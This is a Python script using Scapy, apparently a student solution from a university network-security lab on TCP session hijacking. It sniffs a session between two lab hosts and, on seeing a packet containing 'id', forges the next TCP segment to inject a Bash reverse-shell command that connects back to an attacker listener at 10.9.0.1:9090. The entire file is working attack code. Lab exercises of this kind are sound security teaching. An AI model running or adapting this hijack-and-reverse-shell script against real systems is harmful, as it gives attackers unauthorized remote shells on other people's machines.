nudtns2026spring/Tcp/Labsetup/volumes/reverse_shell_attack.py

#!/usr/bin/env python3
from scapy.all import *

def hijack(pkt):
    if pkt[TCP].payload:
        data = bytes(pkt[TCP].payload)
        if b'id' in data:
            print("Target command detected. Injecting reverse shell...")
            ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
            tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport, flags="A",
                      seq=pkt[TCP].seq + len(pkt[TCP].payload), ack=pkt[TCP].ack)
            
            # Use 10.9.0.1 for the attacker listener
            payload = "\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1 \r"
            res = ip/tcp/payload
            send(res, verbose=0)
            print("Sent hijacked packet with reverse shell.")
            exit(0)

print("Sniffing...")
sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=hijack)